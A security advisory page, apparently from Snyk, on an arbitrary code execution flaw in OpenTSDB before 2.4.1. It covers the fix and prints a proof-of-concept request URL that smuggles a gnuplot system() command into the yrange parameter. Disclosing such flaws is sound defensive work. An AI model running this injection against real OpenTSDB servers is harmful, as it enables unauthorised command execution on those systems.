Arbitrary Code Execution Affecting net.opentsdb:opentsdb Open this link in a new tab package, versions [0,2.4.1)


0.0
high
  • Exploit Maturity

    Mature

  • Attack Complexity

    Low

  • Confidentiality

    High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-JAVA-NETOPENTSDB-1041751

  • published

    15 Dec 2020

  • disclosed

    18 Nov 2020

  • credit

    NightRang3r

How to fix?

Upgrade net.opentsdb:opentsdb to version 2.4.1 or higher.

Overview

net.opentsdb:opentsdb is a scalable, distributed Time Series Database.

Affected versions of this package are vulnerable to Arbitrary Code Execution. It is possible to bypass the command injection sanitation within /src/tsd/GraphHandler.java and execute arbitrary commands. Payload: [33:system('touch/tmp/poc.txt')]

PoC


http://opentsdbhost.local/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('touch/tmp/poc.txt')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json

When passing the payload via one of the parameters it is written to a gnuplot file in the /tmp directory and the gnuplot file is executed by OpenTSDB via the /src/mygnuplot.sh shell script. When executed by OpenTSDB mygnuplot.sh the poc.txt file will be written to the temp directory.

References